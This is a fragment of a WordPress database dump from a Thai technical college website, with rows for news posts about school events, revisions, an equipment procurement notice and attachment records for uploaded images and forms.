(4977, 3, '2019-01-08 11:04:42', '2019-01-08 04:04:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D733185837057607%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๒๘ ธันวาคม ๒๕๖๑ คณะผู้บริหาร ครู และนักเรียน นักศึกษา แผนกวิชาอาหารและโภชนาการ วิทยาลัยเทคนิคระยอง จัดตั้งโครงการมอบของขวัญปีใหม่ ๒๕๖๒ เพื่อประชาชน เปิดสอนทำขนมเค้ก คุกกี้ และแจกให้แก่ประชาชน ตามนโยบายของสำนักงานคณะกรรมการการอาชีวศึกษา ซึ่งโครงการดังกล่าว จัดขึ้นระหว่างวันที่ ๒๘-๒๙ ธันวาคม ๒๕๖๑ ณ ร้านอาหารใบชะมวง วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4975-revision-v1', '', '', '2019-01-08 11:04:42', '2019-01-08 04:04:42', '', 4975, 'http://www.technicrayong.ac.th/4975-revision-v1/', 0, 'revision', '', 0),
(4978, 3, '2019-01-08 14:05:13', '2019-01-08 07:05:13', '', 'สผ.งาน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%9c-%e0%b8%87%e0%b8%b2%e0%b8%99', '', '', '2019-01-08 14:05:13', '2019-01-08 07:05:13', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/สผ.งาน.doc', 0, 'attachment', 'application/msword', 0),
(4979, 3, '2019-02-22 13:30:08', '2019-02-22 06:30:08', '<img class=\"aligncenter size-full wp-image-4758\" src=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-4760\" src=\"/wp-content/uploads/2018/12/Picture1.png\" alt=\"\" width=\"355\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">แผนปฏิบัติราชการ</span></a></h3>\r\n<h3><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">แผนพัฒนาสถานศึกษา </span></a></h3>\r\n<h3><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h3>\r\n<h3><a href=\"/รายงานผลการปฏิบัติงานต\"><span style=\"color: #ff00ff;\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></a></h3>\r\n<h3><a href=\"/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">ปฏิทินปฏิบัติงาน</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2019/01/สผ.งาน.doc\">แบบฟอร์ม สผ.งาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2019/01/สผ.แผนก.doc\">แบบฟอร์ม สผ.แผนก</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">แบบฟอร์มโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h3>\r\n<h3></h3>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและงบประมาณ', '', 'inherit', 'closed', 'closed', '', '1659-autosave-v1', '', '', '2019-02-22 13:30:08', '2019-02-22 06:30:08', '', 1659, 'http://www.technicrayong.ac.th/1659-autosave-v1/', 0, 'revision', '', 0),
(4980, 3, '2019-01-08 14:06:27', '2019-01-08 07:06:27', '', 'สผ.แผนก', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%9c-%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81', '', '', '2019-01-08 14:06:27', '2019-01-08 07:06:27', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/สผ.แผนก.doc', 0, 'attachment', 'application/msword', 0),
(4981, 3, '2019-01-08 14:07:13', '2019-01-08 07:07:13', '<img class=\"aligncenter size-full wp-image-4758\" src=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-4760\" src=\"/wp-content/uploads/2018/12/Picture1.png\" alt=\"\" width=\"355\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><a href=\"/รายงานผลการปฏิบัติงานต\"><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></a></h4>\r\n<h4><a href=\"/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">** ปฏิทินปฏิบัติงาน</span></a></h4>\r\n<h4><a href=\"/wp-content/uploads/2019/01/สผ.งาน.doc\">** แบบฟอร์ม สผ.งาน</a></h4>\r\n<h4><a href=\"/wp-content/uploads/2019/01/สผ.แผนก.doc\">** แบบฟอร์ม สผ.แผนก</a></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและงบประมาณ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2019-01-08 14:07:13', '2019-01-08 07:07:13', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(4982, 3, '2019-01-09 08:37:36', '2019-01-09 01:37:36', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%B4%E0%B8%94-CMT-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด CMT จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-7', '', '', '2019-01-09 08:37:36', '2019-01-09 01:37:36', '', 0, 'http://www.technicrayong.ac.th/?p=4982', 172, 'post', '', 0),
(4983, 3, '2019-01-09 08:37:23', '2019-01-09 01:37:23', '', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด CMT จำนวน ๑ ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-8', '', '', '2019-01-09 08:37:23', '2019-01-09 01:37:23', '', 4982, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-ประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด-CMT-จำนวน-๑-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(4984, 3, '2019-01-09 08:37:36', '2019-01-09 01:37:36', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%B4%E0%B8%94-CMT-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด CMT จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4982-revision-v1', '', '', '2019-01-09 08:37:36', '2019-01-09 01:37:36', '', 4982, 'http://www.technicrayong.ac.th/4982-revision-v1/', 0, 'revision', '', 0),
(4986, 3, '2019-01-09 09:25:48', '2019-01-09 02:25:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2108539505832909&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๒๙ ธันวาคม ๒๕๖๑ พระโบราณพิทักษ์ เจ้าอาวาสวัดลุ่ม (พระอารามหลวง) และคณะสงฆ์อำเภอเมืองระยองมอบทุนการศึกษา \"ตากสินอนุสรณ์\" ประจำปี ๒๕๖๑ ทำบุญอายุวัฒนมงคล ๗๕ ปี ณ ศาลาการเปรียญวัดลุ่ม(พระอารามหลวง) โดยมอบทุนการศึกษาให้กับนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง จำนวน ๕ ทุน ทุนละ ๑,๐๐๐ บาท รวมเป็นเงิน ๕,๐๐๐ บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%92%e0%b9%99-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1%e2%80%8b', '', '', '2019-01-09 09:25:48', '2019-01-09 02:25:48', '', 0, 'http://www.technicrayong.ac.th/?p=4986', 171, 'post', '', 0),
(4987, 1, '2019-01-09 09:20:17', '2019-01-09 02:20:17', 'ผู้ที่เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562\r\nณ วิทยาลัยเทคนิคระยอง สามารถดาวน์โหลดเกียรติบัตร ได้ตามรายชื่อด้านล่าง\r\nโดยมีขั้นตอน ดังนี้\r\n1. คนหารายชื่อของท่าน\r\n2. เมื่อพบรายชื่อแล้ว ให้เปิดดูเกียรติบัตร โดยคลิ๊กที่ ปุ่ม Open\r\n3. เกียรติบัตร จะเป็นไฟล์ PDF ท่านสามารถ สั่งพิมพ์ได้ทันที หรือจะบันทึกไว้ในเครื่องเพื่อสั่งพิมพ์ภายหลังก็ได้\r\n4. การสั่งพิมพ์ ให้ระบุรายละเอียดของการพิมพ์ด้วยว่า พิมพ์พอดีกับกระดาษขนาด A4\r\n5. แนะนำให้พิมพ์กับกระดาษ A4 ชนิดแข็งความหนาตั้งแต่ 150 แกรม ขึ้นไป\r\n\r\n[table id=4 /]', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562', '', 'inherit', 'closed', 'closed', '', '4927-revision-v1', '', '', '2019-01-09 09:20:17', '2019-01-09 02:20:17', '', 4927, 'http://www.technicrayong.ac.th/4927-revision-v1/', 0, 'revision', '', 0),
(4988, 1, '2019-01-09 09:20:53', '2019-01-09 02:20:53', 'ผู้ที่เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562\r\nณ วิทยาลัยเทคนิคระยอง สามารถดาวน์โหลดเกียรติบัตร ได้ตามรายชื่อด้านล่าง\r\nโดยมีขั้นตอน ดังนี้\r\n1. ค้นหารายชื่อของท่าน\r\n2. เมื่อพบรายชื่อแล้ว ให้เปิดดูเกียรติบัตร โดยคลิ๊กที่ ปุ่ม Open\r\n3. เกียรติบัตร จะเป็นไฟล์ PDF ท่านสามารถ สั่งพิมพ์ได้ทันที หรือจะบันทึกไว้ในเครื่องเพื่อสั่งพิมพ์ภายหลังก็ได้\r\n4. การสั่งพิมพ์ ให้ระบุรายละเอียดของการพิมพ์ด้วยว่า พิมพ์พอดีกับกระดาษขนาด A4\r\n5. แนะนำให้พิมพ์กับกระดาษ A4 ชนิดแข็งความหนาตั้งแต่ 150 แกรม ขึ้นไป\r\n\r\n[table id=4 /]', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562', '', 'inherit', 'closed', 'closed', '', '4927-revision-v1', '', '', '2019-01-09 09:20:53', '2019-01-09 02:20:53', '', 4927, 'http://www.technicrayong.ac.th/4927-revision-v1/', 0, 'revision', '', 0),
(4989, 3, '2019-01-09 09:25:10', '2019-01-09 02:25:10', '', '48932566_2108539249166268_8409467273177202688_n', '', 'inherit', 'closed', 'closed', '', '48932566_2108539249166268_8409467273177202688_n', '', '', '2019-01-09 09:25:10', '2019-01-09 02:25:10', '', 4986, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48932566_2108539249166268_8409467273177202688_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4990, 3, '2019-01-09 09:25:48', '2019-01-09 02:25:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2108539505832909&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๒๙ ธันวาคม ๒๕๖๑ พระโบราณพิทักษ์ เจ้าอาวาสวัดลุ่ม (พระอารามหลวง) และคณะสงฆ์อำเภอเมืองระยองมอบทุนการศึกษา \"ตากสินอนุสรณ์\" ประจำปี ๒๕๖๑ ทำบุญอายุวัฒนมงคล ๗๕ ปี ณ ศาลาการเปรียญวัดลุ่ม(พระอารามหลวง) โดยมอบทุนการศึกษาให้กับนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง จำนวน ๕ ทุน ทุนละ ๑,๐๐๐ บาท รวมเป็นเงิน ๕,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4986-revision-v1', '', '', '2019-01-09 09:25:48', '2019-01-09 02:25:48', '', 4986, 'http://www.technicrayong.ac.th/4986-revision-v1/', 0, 'revision', '', 0),
(4991, 3, '2019-01-09 10:05:45', '2019-01-09 03:05:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D739970309712493%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๘ มกราคม ๒๕๖๒ คณะผู้บริหาร คณะครู บุคลากรทางการศึกษา เข้าร่วมประชุมสภากาแฟ เพื่อปรึกษาหารือในการจัดการเรียนการสอนให้สอดคล้อง และเป็นไปในทิศทางเดียวกัน ตลอดจนปัญหาต่างๆที่เกิดขึ้น ณ อาคารช่างเชื่อมโลหะ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%98-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95', '', '', '2019-01-09 10:05:45', '2019-01-09 03:05:45', '', 0, 'http://www.technicrayong.ac.th/?p=4991', 170, 'post', '', 0),
(4992, 3, '2019-01-09 10:04:56', '2019-01-09 03:04:56', '', '49674100_739969716379219_7423576256437813248_o', '', 'inherit', 'closed', 'closed', '', '49674100_739969716379219_7423576256437813248_o', '', '', '2019-01-09 10:04:56', '2019-01-09 03:04:56', '', 4991, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49674100_739969716379219_7423576256437813248_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4993, 3, '2019-01-09 10:05:45', '2019-01-09 03:05:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D739970309712493%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๘ มกราคม ๒๕๖๒ คณะผู้บริหาร คณะครู บุคลากรทางการศึกษา เข้าร่วมประชุมสภากาแฟ เพื่อปรึกษาหารือในการจัดการเรียนการสอนให้สอดคล้อง และเป็นไปในทิศทางเดียวกัน ตลอดจนปัญหาต่างๆที่เกิดขึ้น ณ อาคารช่างเชื่อมโลหะ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4991-revision-v1', '', '', '2019-01-09 10:05:45', '2019-01-09 03:05:45', '', 4991, 'http://www.technicrayong.ac.th/4991-revision-v1/', 0, 'revision', '', 0),
(4994, 3, '2019-01-09 10:11:33', '2019-01-09 03:11:33', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D739985459710978%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๘ มกราคม ๒๕๖๒ นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้ารับประกาศเกียรติคุณบัตร เป็นเด็กดี มีคุณธรรม สามารถเป็นแบบอย่างที่ดีให้แก่นักเรียน นักศึกษา และเด็กทั่วไป จากท่านธีรวัฒน์ สุดสุข รองผู้ว่าราชการจังหวัดระยอง เนื่องในวันเด็กแห่งชาติ ประจำปี ๒๕๖๒ ณ ห้องโสตทัศนศึกษา โรงเรียนมาบตาพุดพันพิทยาคาร ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%98-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95-2', '', '', '2019-01-09 13:12:18', '2019-01-09 06:12:18', '', 0, 'http://www.technicrayong.ac.th/?p=4994', 169, 'post', '', 0),
(4995, 3, '2019-01-09 10:11:13', '2019-01-09 03:11:13', '', '49864459_739983649711159_2133432129915191296_o', '', 'inherit', 'closed', 'closed', '', '49864459_739983649711159_2133432129915191296_o', '', '', '2019-01-09 10:11:13', '2019-01-09 03:11:13', '', 4994, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49864459_739983649711159_2133432129915191296_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4996, 3, '2019-01-09 10:11:33', '2019-01-09 03:11:33', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D739985459710978%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๘ มกราคม ๒๕๖๑ นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้ารับประกาศเกียรติคุณบัตร เป็นเด็กดี มีคุณธรรม สามารถเป็นแบบอย่างที่ดีให้แก่นักเรียน นักศึกษา และเด็กทั่วไป จากท่านธีรวัฒน์ สุดสุข รองผู้ว่าราชการจังหวัดระยอง เนื่องในวันเด็กแห่งชาติ ประจำปี ๒๕๖๒ ณ ห้องโสตทัศนศึกษา โรงเรียนมาบตาพุดพันพิทยาคาร ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4994-revision-v1', '', '', '2019-01-09 10:11:33', '2019-01-09 03:11:33', '', 4994, 'http://www.technicrayong.ac.th/4994-revision-v1/', 0, 'revision', '', 0),
(4997, 3, '2019-01-09 13:12:18', '2019-01-09 06:12:18', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D739985459710978%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๘ มกราคม ๒๕๖๒ นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้ารับประกาศเกียรติคุณบัตร เป็นเด็กดี มีคุณธรรม สามารถเป็นแบบอย่างที่ดีให้แก่นักเรียน นักศึกษา และเด็กทั่วไป จากท่านธีรวัฒน์ สุดสุข รองผู้ว่าราชการจังหวัดระยอง เนื่องในวันเด็กแห่งชาติ ประจำปี ๒๕๖๒ ณ ห้องโสตทัศนศึกษา โรงเรียนมาบตาพุดพันพิทยาคาร ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4994-revision-v1', '', '', '2019-01-09 13:12:18', '2019-01-09 06:12:18', '', 4994, 'http://www.technicrayong.ac.th/4994-revision-v1/', 0, 'revision', '', 0),
(4998, 3, '2019-01-10 08:35:43', '2019-01-10 01:35:43', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D740539092988948%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๙ มกราคม ๒๕๖๒ ตัวแทนจาก บริษัท กรุงเทพซินธิติกส์ จำกัด (BST) เข้ามอบของขวัญสวัสดีปีใหม่ โดยมีว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู เป็นผู้รับมอบ ณ อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%99-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95%e0%b9%96%e0%b9%92-%e0%b8%95', '', '', '2019-01-10 08:35:43', '2019-01-10 01:35:43', '', 0, 'http://www.technicrayong.ac.th/?p=4998', 168, 'post', '', 0),
(4999, 3, '2019-01-10 08:35:20', '2019-01-10 01:35:20', '', '49667130_740539042988953_677782380890554368_o', '', 'inherit', 'closed', 'closed', '', '49667130_740539042988953_677782380890554368_o', '', '', '2019-01-10 08:35:20', '2019-01-10 01:35:20', '', 4998, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49667130_740539042988953_677782380890554368_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5000, 3, '2019-01-10 08:35:43', '2019-01-10 01:35:43', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D740539092988948%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๙ มกราคม ๒๕๖๒ ตัวแทนจาก บริษัท กรุงเทพซินธิติกส์ จำกัด (BST) เข้ามอบของขวัญสวัสดีปีใหม่ โดยมีว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู เป็นผู้รับมอบ ณ อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4998-revision-v1', '', '', '2019-01-10 08:35:43', '2019-01-10 01:35:43', '', 4998, 'http://www.technicrayong.ac.th/4998-revision-v1/', 0, 'revision', '', 0),
(5002, 3, '2019-01-10 09:01:45', '2019-01-10 02:01:45', '', '10-1-2562 9-00-17', '', 'inherit', 'closed', 'closed', '', '10-1-2562-9-00-17', '', '', '2019-01-10 09:01:45', '2019-01-10 02:01:45', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/10-1-2562-9-00-17.png', 0, 'attachment', 'image/png', 0),
(5003, 3, '2019-01-10 09:01:49', '2019-01-10 02:01:49', '', '10-1-2562 9-01-10', '', 'inherit', 'closed', 'closed', '', '10-1-2562-9-01-10', '', '', '2019-01-10 09:01:49', '2019-01-10 02:01:49', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/10-1-2562-9-01-10.png', 0, 'attachment', 'image/png', 0),
